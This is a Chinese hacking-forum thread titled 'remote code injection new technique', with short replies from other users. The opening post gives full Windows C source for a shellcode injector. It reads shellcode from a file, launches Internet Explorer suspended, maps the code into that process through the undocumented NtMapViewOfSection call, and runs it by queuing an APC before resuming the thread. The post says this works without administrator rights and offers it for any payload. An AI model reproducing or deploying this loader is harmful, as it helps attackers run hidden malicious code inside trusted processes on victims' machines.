找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 远程代码注入新技术
返回列表 发新帖
查看: 1012|回复: 7

远程代码注入新技术

[复制链接]
冰狐浪子

3

主题

44

回帖

65

牛毛

初生牛犊

积分
65
发表于 2008-12-25 10:02:49 | 显示全部楼层 来自 广东省佛山市
沙发自己先抢了,哈哈,各位不好意思啊!!圣旦快乐 !
回复

举报

挖墙角文文

321

主题

4191

回帖

6336

牛毛

二级牛人

你的加入是对黑狼最大的支持.

积分
6366
QQ
发表于 2008-12-25 10:06:51 | 显示全部楼层 来自 广东省广州市
不错,支持下.
回复

举报

疯子

1778

主题

5094

回帖

1万

牛毛

论坛管理员

佚名

积分
14675
QQ
发表于 2008-12-25 10:19:57 | 显示全部楼层
[s:159] 德国来的朋友吗?
回复

举报

nchack007

242

主题

2213

回帖

3883

牛毛

版块主管

www.nb5.cn

积分
10239
发表于 2008-12-25 10:27:38 | 显示全部楼层
楼主,yole是谁啊?
回复

举报

long.end

0

主题

12

回帖

16

牛毛

初生牛犊

积分
16
QQ
发表于 2008-12-25 12:03:23 | 显示全部楼层 来自 浙江省绍兴市
[s:182] 这个我也要拿走
回复

举报

..|.k.|..

1

主题

54

回帖

75

牛毛

初生牛犊

积分
75
发表于 2008-12-25 16:28:50 | 显示全部楼层 来自 内蒙古包头市
德国的~
不错!!
回复

举报

冰狐浪子

3

主题

44

回帖

65

牛毛

初生牛犊

积分
65
 楼主| 发表于 2008-12-25 16:32:06 | 显示全部楼层 来自 广东省佛山市
回4楼朋友的话: yole是我在国际安全焦点上认识的一哥们,德国的!!
回复

举报

冰狐浪子

3

主题

44

回帖

65

牛毛

初生牛犊

积分
65
 楼主| 发表于 2008-12-25 09:57:55 | 显示全部楼层 |阅读模式 来自 广东省佛山市
yole分享过来的!!
研究出了一种新的在远程进程中执行代码的可能性,就是利用一个未公开函数在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完 全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求。让源码说明一切:(我为我的中文水平感到抱歉,我来自德国)

Code:

#define _WIN32_WINNT 0x0400
#include <windows.h>

typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;

typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );

func_NtMapViewOfSection NtMapViewOfSection = NULL;


LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;
ULONG Protect;
LPVOID ViewBase;


// 转换偏移量
SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;

// 保存大小和起始地址
ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;

// 转换标志为NT保护属性
if (dwDesiredAccess & FILE_MAP_WRITE)
{
Protect = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
Protect = PAGE_WRITECOPY;
}
else
{
Protect = PAGE_NOACCESS;
}

//映射区段
Status = NtMapViewOfSection(hFileMappingObject,
hProcess,
&ViewBase,
0,
0,
&SectionOffset,
&ViewSize,
ViewShare,
0,
Protect);
if (!NT_SUCCESS(Status))
{
// 失败
return NULL;
}

//返回起始地址
return ViewBase;
}

int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
HMODULE hDll = LoadLibrary( \"ntdll.dll\" );

NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, \"NtMapViewOfSection\");

// 取ShellCode,任何你想实现的
HANDLE hFile = CreateFile (\"C:\\\\shellcode.txt\", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);

// 启动目标进程
STARTUPINFO st;
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);

PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));

CreateProcess (\"C:\\\\Programme\\\\Internet Explorer\\\\iexplore.exe\", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);


// 注入shellcode到目标进程地址空间
LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);

// 创建一个新的能够在目标线程恢复是首先执行的APC
QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
ResumeThread (pi.hThread);
CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}
新技术
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-28 10:34 , Processed in 0.166917 second(s), 55 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表